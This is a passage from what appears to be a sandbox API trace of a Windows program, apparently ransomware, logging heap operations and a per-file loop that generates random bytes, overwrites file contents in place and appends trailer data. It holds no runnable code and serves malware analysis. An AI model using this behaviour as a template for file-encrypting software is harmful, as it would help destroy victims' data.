(HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.245] GetProcessHeap () returned 0x4f10000 [0083.245] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.245] GetProcessHeap () returned 0x4f10000 [0083.245] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.245] GetProcessHeap () returned 0x4f10000 [0083.245] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.245] GetProcessHeap () returned 0x4f10000 [0083.245] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.245] GetProcessHeap () returned 0x4f10000 [0083.245] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.245] GetProcessHeap () returned 0x4f10000 [0083.245] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.245] GetProcessHeap () returned 0x4f10000 [0083.245] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.245] SetFilePointerEx (in: hFile=0x924, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.245] WriteFile (in: hFile=0x924, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.245] WriteFile (in: hFile=0x924, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.245] GetProcessHeap () returned 0x4f10000 [0083.246] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.246] GetProcessHeap () returned 0x4f10000 [0083.246] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.246] GetProcessHeap () returned 0x4f10000 [0083.246] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.246] CloseHandle (hObject=0x924) returned 1 [0083.246] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 105 [0083.249] SetFilePointerEx (in: hFile=0x928, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.249] ReadFile (in: hFile=0x928, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.249] SetFilePointerEx (in: hFile=0x928, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.249] GetProcessHeap () returned 0x4f10000 [0083.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.249] GetProcessHeap () returned 0x4f10000 [0083.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.249] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.249] GetProcessHeap () returned 0x4f10000 [0083.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.249] ReadFile (in: hFile=0x928, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x3a1, lpOverlapped=0x0) returned 1 [0083.261] SetFilePointerEx (in: hFile=0x928, liDistanceToMove=0xfffffc5f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.261] WriteFile (in: hFile=0x928, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x3a1, lpOverlapped=0x0) returned 1 [0083.261] GetProcessHeap () returned 0x4f10000 [0083.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.261] GetProcessHeap () returned 0x4f10000 [0083.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.261] GetProcessHeap () returned 0x4f10000 [0083.261] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.261] GetProcessHeap () returned 0x4f10000 [0083.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.261] GetProcessHeap () returned 0x4f10000 [0083.261] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.261] GetProcessHeap () returned 0x4f10000 [0083.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.261] GetProcessHeap () returned 0x4f10000 [0083.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.261] GetProcessHeap () returned 0x4f10000 [0083.261] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.261] GetProcessHeap () returned 0x4f10000 [0083.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.261] GetProcessHeap () returned 0x4f10000 [0083.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.262] GetProcessHeap () returned 0x4f10000 [0083.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.263] GetProcessHeap () returned 0x4f10000 [0083.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.264] GetProcessHeap () returned 0x4f10000 [0083.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.265] GetProcessHeap () returned 0x4f10000 [0083.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.266] GetProcessHeap () returned 0x4f10000 [0083.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.266] GetProcessHeap () returned 0x4f10000 [0083.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.266] SetFilePointerEx (in: hFile=0x928, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.266] WriteFile (in: hFile=0x928, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.266] WriteFile (in: hFile=0x928, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.266] GetProcessHeap () returned 0x4f10000 [0083.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.266] GetProcessHeap () returned 0x4f10000 [0083.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.266] GetProcessHeap () returned 0x4f10000 [0083.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.266] CloseHandle (hObject=0x928) returned 1 [0083.267] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 106 [0083.271] SetFilePointerEx (in: hFile=0x92c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.271] ReadFile (in: hFile=0x92c, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.271] SetFilePointerEx (in: hFile=0x92c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.271] GetProcessHeap () returned 0x4f10000 [0083.271] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.271] GetProcessHeap () returned 0x4f10000 [0083.271] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.272] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.272] GetProcessHeap () returned 0x4f10000 [0083.272] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.272] ReadFile (in: hFile=0x92c, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x85, lpOverlapped=0x0) returned 1 [0083.274] SetFilePointerEx (in: hFile=0x92c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.274] WriteFile (in: hFile=0x92c, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x85, lpOverlapped=0x0) returned 1 [0083.274] GetProcessHeap () returned 0x4f10000 [0083.274] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.274] GetProcessHeap () returned 0x4f10000 [0083.274] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.274] GetProcessHeap () returned 0x4f10000 [0083.274] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.274] GetProcessHeap () returned 0x4f10000 [0083.275] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.275] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.275] GetProcessHeap () returned 0x4f10000 [0083.276] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.276] GetProcessHeap () returned 0x4f10000 [0083.277] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.277] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 